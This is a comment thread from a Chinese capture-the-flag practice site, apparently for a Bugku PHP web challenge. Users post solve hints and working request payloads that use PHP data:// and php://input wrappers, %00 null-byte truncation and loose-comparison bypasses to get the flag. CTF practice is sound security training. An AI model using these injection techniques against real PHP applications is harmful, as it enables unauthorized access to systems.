评分(28)
解题动态
小白d 攻破了该题 6小时前
23091 攻破了该题 4天前
mmbsklm 攻破了该题 5天前
ggsea 攻破了该题 7天前
__tian__ 攻破了该题 8天前
ipos 攻破了该题 8天前
lixing123 攻破了该题 10天前
whshkdh 攻破了该题 12天前
白色狸花猫 攻破了该题 12天前
i8vkmmju 攻破了该题 13天前
chihaya anon 攻破了该题 14天前
Phantheon 攻破了该题 15天前
zjh240609 攻破了该题 16天前
lyosauway 攻破了该题 17天前
658658xzlz 攻破了该题 18天前
布蕾脆脆奶芙 攻破了该题 19天前
yazhou 攻破了该题 20天前
VCD 攻破了该题 20天前
耶无忧 攻破了该题 22天前
评论
ly89130 1月前
举报
http://160.202.254.160:14094/hello.php?id=abc&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=.4fffd
fi1y 1月前
举报
id=00&a=php://input,bugku%20is%20a%20nice%20plateform!&b=.12345
暗流安全 3月前
举报
/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%0011111
FTJJJ 4月前
举报
POST /hello.php?id=0e123&a=php://input&b=?aaaaaaaa HTTP/1.1 bugku is a nice plateform!
bugfuck2 4月前
举报
查看源代码可以发现注释提示“1p.html”,打开发现会跳转,使用view-source:http://ip/1p.html查看并解码,可以看到源代码,要注意id的值如果是0,在第一步的时候就会跳转会原页面,需要用松散比较绕过,比如id=0a
霓虹 8月前
举报
wp解答的源代码不一样,避雷
对对对对对对对对 9月前
举报
依旧有点意思
soha 10月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 10月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
浩气英风 1月前
举报
试了评论区所有的方法,就你这个能成功。
2686213396 1年前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag